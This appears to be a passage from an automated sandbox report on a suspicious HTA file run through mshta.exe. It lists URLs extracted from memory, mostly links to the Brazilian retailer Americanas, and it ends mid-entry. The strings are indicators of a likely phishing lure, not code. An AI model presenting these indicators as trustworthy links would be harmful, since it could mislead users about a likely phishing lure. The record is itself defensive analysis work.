Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502225000.0000000002E69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canaldedenuncias.com.br/universoamericanas/
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canaldedenuncias.com.br/universoamericanas/6
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509932117.000000000BE33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550466374.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556081838.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.000000000963F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://carreiras.americanas.com/
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cliente.americanas.com.br/minha
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://cliente.americanas.com.br/minha-conta/pedidos
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559750595.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.000000000961C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascgcycc:1080:0
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495634133.000000000A9DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541572740.000000000A9F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresas
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_ft_0_0_empresasY
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508552958.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555009290.000000000BE18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_mn_0_bottom_bndes
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574087890.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567232187.00000000095D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502431408.00000000095D2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=brd_hm_tt_0_0_empresas
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516107435.000000000AB2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559466270.000000000AB2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504872955.00000000095E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577766620.000000000AB2B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573530715.0000000009530000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://empresas.americanas.com.br/?chave=menuacom_aemp_hmem
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504872955.00000000095E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/empresas-cotacao-online?chave=menuacom_aemp_cotacoes
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504872955.00000000095E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://empresas.americanas.com.br/hotsite/receba-ou-retire-hoje?chave=menuacom_aemp_recebaem3h
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515790688.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557816485.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570090833.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566649661.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201G1.jpg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201P.jpg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/produtos/01/00/img3/13439422/9/1343942201P1.jpg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, 